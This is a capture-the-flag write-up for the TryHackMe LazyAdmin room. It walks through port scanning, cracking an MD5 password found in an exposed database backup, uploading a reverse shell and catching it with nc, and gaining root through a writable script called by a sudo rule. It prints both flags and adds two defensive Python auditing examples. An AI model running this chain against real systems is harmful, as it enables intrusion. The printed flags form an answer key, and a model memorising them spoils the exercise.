THM LazyAdmin

What is the user flag?

nmap -sV 10.82.188.170
Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-21 13:49 +0000
Nmap scan report for 10.82.188.170
Host is up (0.022s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


gobuster dir -u 10.82.188.170 -w /usr/share/wordlists/dirb/common.txt -x php,html,js,txt,asp,aspx,jsp

/content              (Status: 301) [Size: 316] [--> http://10.82.188.170/content/]

dirb http://10.82.188.170 -R

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Dec 21 14:08:18 2025
URL_BASE: http://10.82.188.170/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Interactive Recursion

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.82.188.170/ ----
==> DIRECTORY: http://10.82.188.170/content/
+ http://10.82.188.170/index.html (CODE:200|SIZE:11321)
+ http://10.82.188.170/server-status (CODE:403|SIZE:278)

---- Entering directory: http://10.82.188.170/content/ ----
(?) Do you want to scan this directory (y/n)? y     ==> DIRECTORY: http://10.82.188.170/content/_themes/
==> DIRECTORY: http://10.82.188.170/content/as/
==> DIRECTORY: http://10.82.188.170/content/attachment/
==> DIRECTORY: http://10.82.188.170/content/images/
==> DIRECTORY: http://10.82.188.170/content/inc/
+ http://10.82.188.170/content/index.php (CODE:200|SIZE:2199)
==> DIRECTORY: http://10.82.188.170/content/js/

---- Entering directory: http://10.82.188.170/content/_themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.82.188.170/content/as/ ----
(?) Do you want to scan this directory (y/n)? y     + http://10.82.188.170/content/as/index.php (CODE:200|SIZE:3678)
==> DIRECTORY: http://10.82.188.170/content/as/js/
==> DIRECTORY: http://10.82.188.170/content/as/lib/

---- Entering directory: http://10.82.188.170/content/attachment/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.82.188.170/content/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.82.188.170/content/inc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.82.188.170/content/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.82.188.170/content/as/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.82.188.170/content/as/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Dec 21 14:12:52 2025
DOWNLOADED: 13836 - FOUND: 4

Looks like we have a login page at /content/as/, and digging around /content/inc we find /content/inc/mysql_backup/, which has a MySQL database dump sitting there

cat mysql.sql
...
"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\"
...

hash-identifier 42f749ade7f9e195bf475f37a44cafcb

Looks like we might have an MD5 hash; let's see what hashcat gives us

hashcat -a 0 -m 0 42f749ade7f9e195bf475f37a44cafcb /usr/share/wordlists/rockyou.txt
hashcat -a 0 -m 0 42f749ade7f9e195bf475f37a44cafcb /usr/share/wordlists/rockyou.txt --show

Great, looks like we can log into the /content/as/ page as manager with the password we got from hashcat
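An exposed backup holding unsalted MD5 password hashes is the finding to catch before anyone reaches this step. As an added example (not part of the write-up), the following Python parses the serialized-PHP fragment quoted above from the dump, pairs keys with values and flags credential fields by how well their stored value is protected; the field-name lists and the hash-format heuristics are assumptions.

```python
import re

# Constructed sample: the serialized-PHP fragment quoted from the mysql_backup dump on
# this page, as it sits inside the SQL file (the quotes are backslash-escaped there).
SAMPLE_DUMP = r'"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\"'

# One PHP serialized string token, s:<len>:"<value>", tolerating SQL-level escaping.
_TOKEN = re.compile(r's:(\d+):\\*"([^"\\]*)\\*"')

# Field names to report (assumed heuristics, not an exhaustive list).
USER_KEYS = {"admin", "user", "username", "login"}
SECRET_KEYS = {"passwd", "password", "pass", "pwd", "hash"}


def classify_secret(value):
    """Rough judgement of how well a stored credential value resists offline cracking."""
    if value.startswith(("$2a$", "$2b$", "$2y$", "$argon2", "$5$", "$6$")):
        return "salted slow hash"
    if re.fullmatch(r"[0-9a-fA-F]{32}", value):
        return "32-hex unsalted hash (MD5-length): cracks fast offline"
    if re.fullmatch(r"[0-9a-fA-F]{40}", value):
        return "40-hex unsalted hash (SHA-1-length): cracks fast offline"
    return "no recognised hash format (possibly plaintext)"


def extract_strings(text):
    """Return serialized strings whose declared length matches their content."""
    return [v for n, v in _TOKEN.findall(text) if len(v) == int(n)]


def scan_serialized_credentials(text):
    """Pair consecutive key/value strings and report account-related fields.
    Assumes the fragment starts at a key, which holds for the page's dump excerpt."""
    strings = extract_strings(text)
    findings = []
    for key, value in zip(strings[0::2], strings[1::2]):
        if key.lower() in USER_KEYS:
            findings.append({"key": key, "value": value, "note": "account name"})
        elif key.lower() in SECRET_KEYS:
            findings.append({"key": key, "value": value, "note": classify_secret(value)})
    return findings


if __name__ == "__main__":
    for f in scan_serialized_credentials(SAMPLE_DUMP):
        print(f"{f['key']}: {f['value']} -> {f['note']}")
```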

Now let's try one of the exploits on ExploitDB to get a reverse shell

Now that our reverse shell is uploaded to /content/inc/ads/, we can click it or curl it to get a shell

nc -lvnp 4444

I'm going to upgrade to a full TTY to make looking around less of a pain

Looks like we have /home/itguy/user.txt

We have our user flag THM{63e5bce9271952aad1113b6f1ac28a07}

What is the root flag?

sudo -ll
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:

Sudoers entry:
    RunAsUsers: ALL
    Options: !authenticate
    Commands:
    /usr/bin/perl /home/itguy/backup.pl

Looks like there's a Perl script we can run as root. The only issue is that we have read-only access to that file; however, the script calls another script, /etc/copy.sh, which we do have write access to

It looks like there's already a reverse shell in there, so let's just change it to our IP and port and run it
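The root cause here is a sudo rule with !authenticate whose target script executes a file that unprivileged users can modify. As an added example (not the write-up's or the room's code), this Python audit checks a sudo-permitted script and every absolute path it references for group- or world-writable permissions, using a constructed temp-directory fixture modelled on backup.pl and /etc/copy.sh; the path regex is a heuristic assumption.

```python
import os
import re
import stat
import tempfile

# Heuristic for absolute paths named inside a script (the page's backup.pl calls
# /etc/copy.sh this way). Assumption: dependencies are literal, not built at runtime.
_PATH_RE = re.compile(r"(?<![\w/])(/(?:[\w.-]+/)*[\w.-]+)")


def loose_permissions(path):
    """Return a reason string if the file has loose write bits, else None."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return None  # a missing dependency is a separate finding, not handled here
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "group- or world-writable"
    return None


def audit_sudo_script(script_path):
    """Map each loosely permitted file (the script itself or one it references) to the reason.
    Any entry means whoever can write that file inherits the privileges the sudo rule grants."""
    with open(script_path, encoding="utf-8") as fh:
        referenced = sorted(set(_PATH_RE.findall(fh.read())))
    findings = {}
    for path in [script_path] + referenced:
        reason = loose_permissions(path)
        if reason:
            findings[path] = reason
    return findings


def build_demo_fixture():
    """Constructed stand-in for the page's layout: a read-only script calling a
    world-writable helper (copy.sh) and a correctly locked-down one (keep.sh)."""
    root = tempfile.mkdtemp()
    helper, safe, script = (os.path.join(root, n) for n in ("copy.sh", "keep.sh", "backup.pl"))
    with open(script, "w", encoding="utf-8") as fh:
        fh.write(f'system("sh", "{helper}");\nsystem("sh", "{safe}");\n')
    for path in (helper, safe):
        with open(path, "w", encoding="utf-8") as fh:
            fh.write("#!/bin/sh\necho backup\n")
    os.chmod(helper, 0o666)  # the flaw: anyone can edit what root will execute
    os.chmod(safe, 0o644)
    os.chmod(script, 0o644)
    return script, helper, safe
```

Running audit_sudo_script on the fixture reports only copy.sh; the same check against a real sudoers entry is a quick way to confirm a NOPASSWD command cannot be hijacked through its dependencies.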

sudo /usr/bin/perl /home/itguy/backup.pl


nc -lvnp 4445
listening on [any] 4445 ...
connect to [x.x.x.x] from (UNKNOWN) [x.x.x.x] 60014

And we now have root access.

Checking /root, we find /root/root.txt.

Final flag THM{6637f41d0177b6f37cb20d775124699f}